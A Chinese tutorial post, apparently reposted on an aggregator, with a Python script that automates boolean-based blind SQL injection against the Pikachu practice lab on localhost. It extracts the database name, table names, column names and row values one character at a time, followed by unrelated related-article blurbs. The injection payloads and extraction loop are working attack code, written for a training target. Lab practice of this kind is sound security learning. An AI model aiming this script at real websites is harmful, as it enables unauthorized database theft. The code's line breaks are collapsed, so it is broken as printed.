pikachu靶场(SQL注入基于布尔的盲注)python实现

import requests
from bs4 import BeautifulSoupurl = "http://localhost:8086/pikachu-master/vul/sqli/sqli_blind_b.php"def get_database_name(url):dataname = ''  # 初始化一个空字符串用于存储数据库名dict = 'abcdefghijklmnopqrstuvwxyz '  # 数据库名可能存在这些字段中的任意一个i = 1while True:for j in dict:  # 遍历dict中的字符payload = {'name': "admin' and substr(database(),%d,1) ='%s'-- " % (i, j),# 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较'submit': "%E6%9F%A5%E8%AF%A2"}response = requests.request("get", url, params=payload)  # 发送请求soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息if 'uid' in token:  # 如果提示信息中包含uid,说明数据库名可能存在该字符if j != ' ':  # 如果该字符为z,说明数据库名可能存在该字符dataname += j  # 将该字符添加到数据库名中i += 1else:  # 如果该字符为 ',说明数据库名可能存在该字符,但由于该字符在数据库名中是最后一个,所以不再添加return datanamedatabase_name = get_database_name(url)
print("数据库名为:" + database_name)def get_table_name(url, database_name):table_name = ""  # 初始化一个空字符串用于存储表名dict = 'abcdefghijklmnopqrstuvwxyz, '  # 表名可能存在这些字段中的任意一个i = 1while True:for j in dict:payload = {'name': "admin' and substr((select group_concat(table_name) from information_schema.tables where table_schema='%s'),%d,1) ='%s'-- " % (database_name, i, j),# 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较'submit': "%E6%9F%A5%E8%AF%A2"}response = requests.request("get", url, params=payload)  # 发送请求soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息if 'uid' in token:  # 如果提示信息中包含uid,说明表名可能存在该字符if j != ' ':table_name += ji += 1else:return table_name  # 找到表名后返回database_name = input("请输入您要查询的数据库名:")
table_name = get_table_name(url, database_name)
print("表名为:" + table_name)def get_column_name(url, database_name, table_name):column_name = ''  # 初始化一个空字符串用于存储列名dict = 'abcdefghijklmnopqrstuvwxyz, '  # 列名可能存在这些字段中的任意一个i = 1while True:for j in dict:  # 遍历dict中的字符payload = {'name': "admin' and substr((select group_concat(column_name) from information_schema.columns where table_schema='%s' and table_name='%s'),%d,1) ='%s'-- " % (database_name, table_name, i, j),# 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较'submit': "%E6%9F%A5%E8%AF%A2"}response = requests.request("get", url, params=payload)  # 发送请求soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息if 'uid' in token:  # 如果提示信息中包含uid,说明列名可能存在该字符if j != ' ':  column_name += j  # 将该字符添加到列名中i += 1else:   return column_name  # 找到列名后返回table_name = input('请输入您要查询的表名:')
column_name = get_column_name(url, database_name, table_name)
print("列名为:" + column_name)def get_value(url,table_name,column_name1,column_name2):value= ''dict = 'abcdefghijklmnopqrstuvwxyz1234567890, 'i = 1while True:for j in dict:  # 遍历dict中的字符payload = {'name': "admin' and substr((select group_concat(concat(%s,',',%s)) from %s),%d,1) ='%s'-- " % (column_name1, column_name2 , table_name,i,j),# 这里的substr函数用于截取数据库名的第i个字符,并与dict中的字符进行比较'submit': "%E6%9F%A5%E8%AF%A2"}response = requests.request("get", url, params=payload)  # 发送请求soup = BeautifulSoup(response.text, 'html.parser')  # 解析响应内容token = soup.find_all('p', class_="notice")[0].text  # 找到页面中的提示信息if 'uid' in token:if j != ' ':value += ji += 1else:return valueinput_value = input('请输入您要查询的列名1:')
input_value2 = input('请输入您要查询的列名2:')
value = get_value(url, table_name, input_value, input_value2)
print("查询结果为:" + value)

执行结果

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/diannao/14545.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

docker实战之搭建MYSQL8.0主从同步

docker实战之搭建MYSQL8.0主从同步

目录 环境配置容器创建主服务器创建MYSQL容器新增my.cnf文件创建用户并授权 从服务器创建MYSQL容器新增my.cnf文件重启MYSQL容器配置主从同步 验证主从同步彩蛋 MySQL 主从同步(Master-Slave Replication)是一种常用的解决方案,它允许一个主服…
阅读更多...
LabVIEW与串口通讯在运行一段时间后出现数据接收中断的问题

LabVIEW与串口通讯在运行一段时间后出现数据接收中断的问题

这些问题可能与硬件、软件或通信协议有关。以下是详细的原因分析和可能的解决方案: 一、硬件原因 串口线缆或接口问题: 由于长时间使用,串口线缆可能出现接触不良或损坏。接口松动也可能导致通讯中断。 解决方案:检查并更换串口…
阅读更多...
【Text2SQL 经典模型】X-SQL

【Text2SQL 经典模型】X-SQL

论文:X-SQL: reinforce schema representation with context ⭐⭐⭐⭐ Microsoft, arXiv:1908.08113 X-SQL 与 SQLova 类似,使用 BERT style 的 PLM 来获得 representation,只是融合 NL question 和 table schema 的信息的方式不太一样&#…
阅读更多...
Linux c开发线程锁和条件变量使用

Linux c开发线程锁和条件变量使用

#include <pthread.h> #include <stdio.h> #include <unistd.h>pthread_mutex_t mutex PTHREAD_MUTEX_INITIALIZER; pthread_cond_t cond PTHREAD_COND_INITIALIZER;void* thread_function(void* arg) {printf("线程等待唤醒,锁定互斥量...\n");…
阅读更多...
windows平台vcpkg安装

windows平台vcpkg安装

1. 克隆vcpkg仓库 git clone https://github.com/microsoft/vcpkg 2.运行bootstrap-vcpkg.bat下载vcpkg.exe 3.运行验证 4.使用VCPKG安装OPENSSL 5.安装成功
阅读更多...
VC++学习(1)——环境准备,参考文档等,初步入门VC++

VC++学习(1)——环境准备,参考文档等,初步入门VC++

目录 引出环境准备&#xff0c;参考文档第一讲 初步入门键盘按下的消息鼠标左键按下报错源码新建一个工程 总结 引出 VC学习&#xff08;1&#xff09;——环境准备&#xff0c;参考文档等&#xff0c;初步入门VC C是一门编程语言,他的语法标准和语言特性是全球统一的 VC是微…
阅读更多...
计算机系统概述习题

计算机系统概述习题

选择题 电子计算机问世至今&#xff0c;新型计算机不断推陈出新&#xff0c;不管怎么更新&#xff0c;依然具有“存储程序”的特点&#xff0c;最早提出这种概念的是(B) A. 巴贝奇 B. 冯*诺伊曼 C. 帕斯卡 D. 贝尔 B下列描述中___是正确的。 A. 控制器能理解&#xff0c;解释…
阅读更多...
中国主要城市房价指数数据集(2011-2024)

中国主要城市房价指数数据集(2011-2024)

数据来源&#xff1a;东方财富网 时间跨度&#xff1a;2011年1月 - 2024年4月 数据范围&#xff1a;中国主要城市 包含指标&#xff1a; 日期、城市 新建商品住宅价格指数-同比 新建商品住宅价格指数-环比 新建商品住宅价格指数-定基 二手住宅价格指数-环比 二手住宅价格指…
阅读更多...
Visual Studio 调试及快捷键

Visual Studio 调试及快捷键

文章目录 原文连接环境一、调试器的基本使用1、更改执行流2、快速执行某一条代码断点设置条件断点查看内存信息查看调用堆栈查看寄存器信息设置监视断点调试二、快捷键一、窗口快捷键二、查找相关快捷键三、代码快捷键原文连接 【教程】visual studio debug 技巧总结 环境 一…
阅读更多...
OpenCASCADE Draw模块TKDraw项目问题修改

OpenCASCADE Draw模块TKDraw项目问题修改

1.问题 在调试Draw模块代码时&#xff0c;出现一个小问题&#xff0c;导致无法正常运行 如下&#xff1a; 2.代码跟踪 通过代码跟踪发现时一个数组越界问题&#xff0c;在此处添加了判断处理&#xff0c;程序可以正常调试
阅读更多...
数据结构顺序表实现通讯录

数据结构顺序表实现通讯录

目录 1. 前言&#xff1a; 2.通讯录项目的创建 3. 通讯录的实现 3.1 通讯录的初始化 3.2 通讯录的销毁 3.3 通讯录添加数据 3.4 通讯录查找数据 3.5 通讯录展示数据 3.6 通讯录删除数据 3.7 通讯录修改数据 4. 通讯录完整代码 4.1 test.c 4.2 SeqList.h 4.3 SeqLis…
阅读更多...
数据结构(Java实现):ArrayList

数据结构(Java实现):ArrayList

目录 1.ArrayList简介2.ArrayList构造方法分析3.ArrayList的add方法以及扩容机制4.ArrayList常用方法5.ArrayList遍历6.ArrayList的缺陷 1.ArrayList简介 在集合框架中&#xff0c;ArrayList是一个普通的类&#xff0c;实现了List接口&#xff0c;具体框架图如下&#xff1a; …
阅读更多...
编写一个llvm编译器插件,完成在store汇编指令前对内存合法性的check。

编写一个llvm编译器插件,完成在store汇编指令前对内存合法性的check。

dds(iceoryx、fastdds等)中间件采用了共享内存&#xff0c;如果app内存越界将共享内存踩踏坏了&#xff0c;将会形成灾难。本插件可以检测到app是否在写共享内存&#xff0c;如果是&#xff0c;我们可以让app assert。从而提高dds的稳定性 插件效果&#xff1a; 插件源码&…
阅读更多...
话题:如何让大模型变得更聪明?

话题:如何让大模型变得更聪明?

随着人工智能&#xff08;AI&#xff09;技术的迅速发展&#xff0c;大模型&#xff08;如GPT-4、BERT、Transformer等&#xff09;在自然语言处理、图像识别和语音识别等领域取得了显著成果。然而&#xff0c;如何让大模型变得更聪明&#xff0c;进一步提升其性能和应用效果&a…
阅读更多...
Jetbrain | IDEA的启动logo替换成可爱的vtuber-logo

Jetbrain | IDEA的启动logo替换成可爱的vtuber-logo

看了这个&#xff0c;好可爱 【上Github热榜了&#xff01;当编程语言的Logo变得可爱起来~】 又看了这个 光速整活&#xff0c;强啊 看到很多人整IDEA的logo包括我自己&#xff0c;都不是特别方便的搞&#xff0c;我就直接把文件放在绑定资源里直接下吧 然后直接找到本体的安…
阅读更多...
【深度学习】与【PyTorch实战】

【深度学习】与【PyTorch实战】

目录 一、深度学习基础 1.1 神经网络简介 1.2 激活函数 1.3 损失函数 1.4 优化算法 二、PyTorch基础 2.1 PyTorch简介 2.2 张量操作 2.3 构建神经网络 2.4训练模型 2.5 模型评估 三、PyTorch实战 3.1 数据加载与预处理 3.2 模型定义与训练 3.3 模型评估与调优 3…
阅读更多...
成都青年AI人才崭露头角,知了汇智科技助力孵化营大放异彩

成都青年AI人才崭露头角,知了汇智科技助力孵化营大放异彩

5月18日-19日&#xff0c;为期两天的成都国际商贸城青年&#xff08;大学生&#xff09;AI应用孵化营活动在热烈的氛围中圆满落幕。本次活动由成都国际商贸城、成都成商数字科技有限公司、成都知了汇智科技有限公司及成都电商职教集团联合举办&#xff0c;旨在为青年&#xff0…
阅读更多...
丢失api-ms-win-crt-runtime-l1-1-0.dll的多种解决方法分析,教你简单的一键修复

丢失api-ms-win-crt-runtime-l1-1-0.dll的多种解决方法分析,教你简单的一键修复

在使用Windows操作系统时&#xff0c;用户可能会遇到一个涉及丢失 ​api-ms-win-crt-runtime-l1-1-0.dll文件的警告&#xff0c;这可能导致某些程序无法正常运行。该DLL文件属于Microsoft Visual C Redistributable软件包的一部分&#xff0c;这个软件包为多个应用提供运行时支…
阅读更多...
深度学习-Softmax回归+损失函数+图像分类数据集

深度学习-Softmax回归+损失函数+图像分类数据集

目录 Softmax回归回归 VS 分类Kaggle上的分类问题 从回归到多类分类回归分类从回归到多类分类-均方损失从回归到多类分类-无校验比例从回归到多类分类-校验比例 Softmax和交叉熵损失总结损失函数均方损失绝对值损失函数鲁棒损失 图像分类数据集通过框架中内置函数将FashionMNIS…
阅读更多...
RabbitMQ---交换机-Fanout-Direct

RabbitMQ---交换机-Fanout-Direct

Publisher&#xff1a;生产者&#xff0c;不再发送消息到队列中&#xff0c;而是发给交换机Exchange&#xff1a;交换机&#xff0c;一方面&#xff0c;接收生产者发送的消息。另一方面&#xff0c;知道如何处理消息&#xff0c;例如递交给某个特别队列、递交给所有队列、或是将…
阅读更多...
推荐文章
最新文章

Copyright @ 2022~2023